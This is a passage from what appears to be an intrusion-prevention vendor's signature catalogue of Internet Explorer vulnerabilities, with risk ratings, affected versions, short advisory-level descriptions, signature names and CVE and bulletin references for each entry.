There has been reported a use-after-free vulnerability in Microsoft Internet Explorer 11. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-Scripting-Engine-Vulnerability-CVE-2018-0866

References:

CVE-2018-0866
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0866

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Internet-Explorer-Scrollintoview-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-630-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0;Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0;Internet Explorer 11.0

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Scrollintoview-Use-After-Free

References:

CVE-2015-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0017

BID-72402
http://www.securityfocus.com/bid/72402

OSVDB-118141
http://www.osvdb.org/118141

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Microsoft-Internet-Explorer-Select-Element-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1733-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way in which IE handles list indices for certain objects. A remote attacker could exploit this vulnerability by enticing a target user to view a specially crafted webpage, or open a crafted Microsoft Office document that hosts the IE rendering engine and contains an ActiveX control marked "safe for initialization". A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Text_MS-Internet-Explorer-Select-Element-Remote-Code-Execution

References:

CVE-2011-1999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1999

BID-49964
http://www.securityfocus.com/bid/49964

OSVDB-76211
http://www.osvdb.org/76211

MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081

Microsoft-Internet-Explorer-SelectAll-CVE-2012-0171

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 6.0; Internet Explorer 9.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-SelectAll-CVE-2012-0171

References:

CVE-2012-0171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0171

BID-52905
http://www.securityfocus.com/bid/52905

MS12-023
http://technet.microsoft.com/security/bulletin/MS12-023

Microsoft-Internet-Explorer-Selection.empty-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A User-After-Free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to improper handling of the selection.empty script expression. Remote attackers can exploit this vulnerability by enticing target users to open a malicious web page using Internet Explorer, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. In an attack scenario where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the logic of the malicious code. If such an attack is not successful, Internet Explorer may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-Selection.empty-Use-After-Free

References:

CVE-2011-1261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1261

OSVDB-72951
http://www.osvdb.org/72951

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-Shell.Application-Object-Vulnerability-v1.0

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Code Injection

Description:

There is a weakness in the way Internet Explorer, a web browser developed and maintained by Microsoft Corporation, handles the ActiveX components Shell.Application and Wscript.Shell. Using known, unpatched vulnerabilities to cross into a less restricted security zone, an attacker can use these ActiveX objects to execute arbitrary code.

Situation:

File-Text_Shell.Application-ActiveX-Object-Local-File-Execute

References:

BID-10652
http://www.securityfocus.com/bid/10652

Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption

About this vulnerability:

Remote exploitable vulnerability in Microsoft Speech API

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Microsoft Speech API (SAPI) ActiveX controls. The vulnerability can be triggered by passing overly long string to various method of the SAPI ActiveX controls. An attacker can exploit this vulnerability for code execution by enticing a target user to open a malicious HTML document. Any code injected using this vulnerability would be executed in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption

References:

CVE-2007-2222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2222

BID-24426
http://www.securityfocus.com/bid/24426

OSVDB-35353
http://www.osvdb.org/35353

MS07-033
http://technet.microsoft.com/security/bulletin/MS07-033

Microsoft-Internet-Explorer-Status-Bar-Url-Spoofing

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability exists in the way Microsoft Internet Explorer displays a URL in the status bar. A specially crafted HTML link can be masqueraded in the status bar to an arbitrary URL. This can be used by an attacker to entice a user into visiting a malicious web page that, through masquerading, appears to be a trusted web page.

Situation:

File-Text_Microsoft-Internet-Explorer-Status-Bar-Url-Spoofing

References:

BID-11561
http://www.securityfocus.com/bid/11561

Microsoft-Internet-Explorer-Style-Object-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles CSS style objects. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the logged-on user. In the case of a successful attack, the behaviour of the target machine is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Style-Object-Memory-Corruption

References:

CVE-2009-3672
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3672

BID-37085
http://www.securityfocus.com/bid/37085

MS09-072
http://technet.microsoft.com/security/bulletin/MS09-072

Microsoft-Internet-Explorer-Style-Object-Memory-Corruption-CVE-2011-1964

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Microsoft's Internet Explorer (IE). The vulnerability is due to insufficient validation of an object assigned as a style's behaviour. A remote attacker can exploit this vulnerability by enticing a target user to visit a crafted web page in IE. Successful exploitation could result in execution of arbitrary code in the target user's security context. An unsuccessful exploitation attempt may result in the abnormal termination of the affected IE process.

Situation:

File-Text_MS-Internet-Explorer-Style-Object-Memory-Corruption-CVE-2011-1964

References:

CVE-2011-1964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1964

MS11-057
http://technet.microsoft.com/security/bulletin/MS11-057

Microsoft-Internet-Explorer-SVG-Marker-Object-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-641-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an issue with dangling pointer reuse through the manipulation of document elements. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.

Situation:

File-TextId_Microsoft-Internet-Explorer-SVG-Marker-Object-Use-After-Free

References:

CVE-2015-1668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1668

BID-74004
http://www.securityfocus.com/bid/74004

OSVDB-120622
http://www.osvdb.org/120622

MS15-032
http://technet.microsoft.com/security/bulletin/MS15-032

Microsoft-Internet-Explorer-SVG-Memory-Corruption-CVE-2015-6134

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-TextId_Microsoft-Internet-Explorer-SVG-Memory-Corruption-CVE-2015-6134

References:

CVE-2015-6134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6134

MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124

Microsoft-Internet-Explorer-Table-Layout-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows Vista; Windows 2003; Windows 2008

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There a memory corruption issue with Internet Explorer related to HTML Table objects.

Situation:

File-Text_Microsoft-Internet-Explorer-Table-Layout-Memory-Corruption

References:

CVE-2008-2258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2258

BID-30610
http://www.securityfocus.com/bid/30610

MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045

Microsoft-Internet-Explorer-Tabular-Data-Control-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due a design error in the TDCCtl ActiveX Control in the handling of long URLs. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code execution is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in this case would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-Tabular-Data-Control-Memory-Corruption

References:

CVE-2010-0805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0805

BID-39025
http://www.securityfocus.com/bid/39025

MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018

Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-406-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257
File-Text_MS-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257

References:

CVE-2011-1961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1961

MS11-057
http://technet.microsoft.com/security/bulletin/MS11-057

Microsoft-Internet-Explorer-Textrange-Memory-Corruption-CVE-2015-6154

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0;

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Textrange-Memory-Corruption-CVE-2015-6154

References:

CVE-2015-6154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6154

MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124

Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-162-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Integer Overflow

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to an integer overflow error when storing a text string, which leads to memory corruption in the browser. Remote unauthenticated attackers could exploit this vulnerability by persuading a target user to visit a specially crafted Web site. Successful exploitation causes memory corruption that may lead to arbitrary code execution in the security context of the logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption

References:

CVE-2008-2255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2255

BID-28295
http://www.securityfocus.com/bid/28295

MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045

Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
File-Text_Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255

References:

CVE-2011-1255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1255

OSVDB-72947
http://www.osvdb.org/72947

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-Time-Element-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way in which HTML+Time elements are processed, and can result in access to an object that is not initialized, or has already been deleted. By enticing a target user to view a maliciously crafted web page, a remote attacker could exploit this vulnerability to run arbitrary code in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Time-Element-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255

References:

CVE-2011-1255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1255

OSVDB-72947
http://www.osvdb.org/72947

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-Title-Element-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Title-Element-Use-After-Free

References:

CVE-2012-1877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1877

OSVDB-82867
http://www.osvdb.org/82867

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-toJSON-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1216-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a vulnerability in Microsoft Internet Explorer, versions 9, 10, and 11, which allows remote attackers to execute arbitrary code by sending a target user a specially crafted web page or document, due to an error while handling certain objects when processing script code.

Situation:

File-Text_Microsoft-Internet-Explorer-toJSON-Use-After-Free

References:

CVE-2019-1429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1429

Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting

About this vulnerability:

A cross site scripting vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-327-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Cross-site Scripting

Description:

There is a cross site scripting vulnerability in Microsoft Internet Explorer. By enticing the target user to view a web page that uses the "toStaticHTML" method maliciously, a remote attacker can disclose sensitive information or execute arbitrary script code within the context of the target user's browser.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
File-Text_Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting

References:

CVE-2010-1257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1257

BID-40409
http://www.securityfocus.com/bid/40409

OSVDB-65211
http://www.osvdb.org/65211

MS10-039
http://technet.microsoft.com/security/bulletin/MS10-039

MS10-035
http://technet.microsoft.com/security/bulletin/MS10-035

Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2

Software:

Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252
File-Text_Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252

References:

CVE-2011-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1252

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-TSUserEX.DLL-ActiveX-Control-Vulnerability

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-585-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Input Validation

Description:

There is a vulnerability in Internet Explorer 6.0 that can be triggered by instantiating the TSUserEX.DLL ActiveX Control.

Situation:

File-Text_Microsoft-Internet-Explorer-TSUserEX.DLL-ActiveX-Control-Vulnerability

References:

CVE-2006-4219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4219

BID-19570
http://www.securityfocus.com/bid/19570

OSVDB-29351
http://www.osvdb.org/29351

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8114

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

There has been reported a type confusion vulnerability in Microsoft Internet Explorer 11. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8114

References:

CVE-2018-8114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8114

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8122

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8122

References:

CVE-2018-8122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8122

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8279

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1084-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

There has been reported a type confusion vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8279

References:

CVE-2018-8279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8279

ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8283

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1084-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8283

References:

CVE-2018-8283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8283

ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8291

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1084-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8291

References:

CVE-2018-8291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8291

ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul

Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8298

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1084-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8298

References:

CVE-2018-8298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8298

ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-234-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption

References:

CVE-2009-1919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1919

MS09-034
http://technet.microsoft.com/security/bulletin/MS09-034

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2530

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-257-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is an uninitialized memory corruption vulnerability in Microsoft Internet Explorer. A successful attack may lead to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2530
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2530

References:

CVE-2009-2530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2530

MS09-054
http://technet.microsoft.com/security/bulletin/MS09-054

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2531

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-257-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is an uninitialized memory corruption vulnerability in Microsoft Internet Explorer. A successful attack may lead to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2531
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2531

References:

CVE-2009-2531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2531

MS09-054
http://technet.microsoft.com/security/bulletin/MS09-054

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0244

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Memory-Corruption-CVE-2010-0244
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2010-0244

References:

CVE-2010-0244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0244

MS10-002
http://technet.microsoft.com/security/bulletin/MS10-002

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0267

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due the way that Internet Explorer handles certain type of mouse movement events. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the logic of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

File-Text_Microsoft-Ie-Memory-Corruption-CVE-2010-0267

References:

CVE-2010-0267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0267

BID-39023
http://www.securityfocus.com/bid/39023

MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3328

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-346-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328-2

References:

CVE-2010-3328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3328

BID-43705
http://www.securityfocus.com/bid/43705

MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3329

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-346-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-HtmlDlgHelper-ActiveX-Component-Usage
File-Text_Microsoft-HtmlDlgHelper-ActiveX-Component-Usage

References:

CVE-2010-3329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3329

BID-43706
http://www.securityfocus.com/bid/43706

MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071

Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3331

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-346-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Scriptlet-ActiveX-Component-Usage
File-Text_Microsoft-Scriptlet-ActiveX-Component-Usage

References:

CVE-2010-3331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3331

MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071

Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 2008 R2

Software:

